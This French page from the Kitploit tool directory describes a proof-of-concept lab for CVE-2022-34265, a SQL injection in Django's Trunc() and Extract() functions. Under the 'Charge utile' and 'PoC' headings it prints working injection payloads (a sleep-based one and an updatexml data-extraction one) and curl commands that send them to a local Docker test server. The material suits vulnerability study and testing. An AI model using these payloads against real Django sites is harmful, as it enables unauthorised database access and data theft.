Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-34265 — PoC pour CVE-2022-34265 | Kitploit
Outils/GitHubGitHub/zhaoqi99/cve-2022-34265
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubzhaoqi99/cve-2022-34265

CVE-2022-34265

PoC pour CVE-2022-34265

Voir le dépôt
42il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-34265

PoC pour CVE-2022-34265


Description

Un problème a été découvert dans Django 3.2 avant 3.2.14 et 4.0 avant 4.0.6. Les fonctions de base de données Trunc() et Extract() sont sujettes à une injection SQL si des données non fiables sont utilisées comme valeur kind/lookup_name. Les applications qui limitent le choix du lookup name et du kind à une liste sûre connue ne sont pas affectées.

Utilisation

Démarrer

root@kitploit:~
git clone https://github.com/ZhaoQi99/CVE-2022-34265.git
cd CVE-2022-34265
docker-compose up -d

Supprimer

root@kitploit:~
docker-compose down

Versions affectées

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Versions corrigées

Télécharger l’outil
  • Django 3.2.14

  • Django 4.0.6

Vérification

Environnement

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

Charge utile

  • YEAR FROM start_time)) ;select sleep(5)--

  • YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--

PoC

root@kitploit:~
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20%3Bselect%20sleep(5)--"
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20and%20updatexml(1%2Cconcat(1%2C(select%20name%20from%20TEST%20limit%201)%2C1)%2C1)--"

PS : Dans le cas de bases de données différentes, l'existence de vulnérabilités est différente. La vulnérabilité n'existe pas dans la fonction Trunc du backend de base de données MYSQL.

Références

  • Signaleur : TAKUTO YOSHIKAI (en utilisant PostgreSQL)

  • django/django@877c800

  • django/django@5e2f4dd

  • https://github.com/advisories/GHSA-p64x-8rxx-wf6q

  • CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区